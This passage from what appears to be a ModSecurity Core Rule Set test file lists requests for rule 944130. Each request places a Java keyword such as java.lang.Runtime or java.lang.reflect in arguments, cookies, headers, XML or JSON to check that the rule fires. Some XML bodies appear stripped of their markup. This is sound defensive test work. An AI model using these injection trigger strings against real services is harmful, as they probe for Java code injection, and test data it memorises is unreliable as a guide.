"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.reflect method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-335 desc: "XML attribute value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-336 desc: "XML element value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-337 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-338 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.reflect" output: log_contains: "id \"944130\"" - test_title: 944130-339 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.reflect\"}" output: log_contains: "id \"944130\"" - test_title: 944130-340 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.reflect\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-341 desc: "Argument test includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Runtime" output: log_contains: "id \"944130\"" - test_title: 944130-342 desc: "Argument name includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.Runtime=test" output: log_contains: "id \"944130\"" - test_title: 944130-343 desc: "Cookie test includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.Runtime method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-344 desc: "Cookie name includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.Runtime=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-345 desc: "Request header test includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.Runtime method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-346 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-347 desc: "XML element value includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Runtime" output: log_contains: "id \"944130\"" - test_title: 944130-348 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.Runtime" output: log_contains: "id \"944130\"" - test_title: 944130-349 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.Runtime" output: log_contains: "id \"944130\"" - test_title: 944130-350 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.Runtime\"}" output: log_contains: "id \"944130\"" - test_title: 944130-351 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.Runtime\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-352 desc: "Argument test includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.String" output: log_contains: "id \"944130\"" - test_title: 944130-353 desc: "Argument name includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.String=test" output: log_contains: "id \"944130\"" - test_title: 944130-354 desc: "Cookie test includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.String method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-355 desc: "Cookie name includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.String=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-356 desc: "Request header test includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.String method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-357 desc: "XML attribute value includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-358 desc: "XML element value includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.String" output: log_contains: "id \"944130\"" - test_title: 944130-359 desc: "Nested XML element value includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.String" output: log_contains: "id \"944130\"" - test_title: 944130-360 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.String" output: log_contains: "id \"944130\"" - test_title: 944130-361 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.String\"}" output: log_contains: "id \"944130\"" - test_title: 944130-362 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.String\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-363 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.StringBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-364 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.StringBuilder=test" output: log_contains: "id \"944130\"" - test_title: 944130-365 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.StringBuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-366 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.StringBuilder=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-367 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.StringBuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-368 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-369 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.StringBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-370 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.StringBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-371 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.StringBuilder" output: log_contains: "id \"944130\"" - test_title: 944130-372 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.StringBuilder\"}" output: log_contains: "id \"944130\"" - test_title: 944130-373 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.lang.StringBuilder\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-374 desc: "Argument test includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.lang.System" output: log_contains: "id \"944130\"" - test_title: 944130-375 desc: "Argument name includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.lang.System=test" output: log_contains: "id \"944130\"" - test_title: 944130-376 desc: "Cookie test includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.lang.System method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-377 desc: "Cookie name includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.lang.System=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-378 desc: "Request header test includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.lang.System method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-379 desc: "XML attribute value includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-380 desc: "XML element value includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.System" output: log_contains: "id \"944130\"" - test_title: 944130-381 desc: "Nested XML element value includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.lang.System" output: log_contains: "id \"944130\"" - test_title: 944130-382 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.lang.System" output: log_contains: "id \"944130\"" - test_title: 944130-383 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.lang.System\"}" output: log_contains: "id \"944130\"" - test_title: 944130-384 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 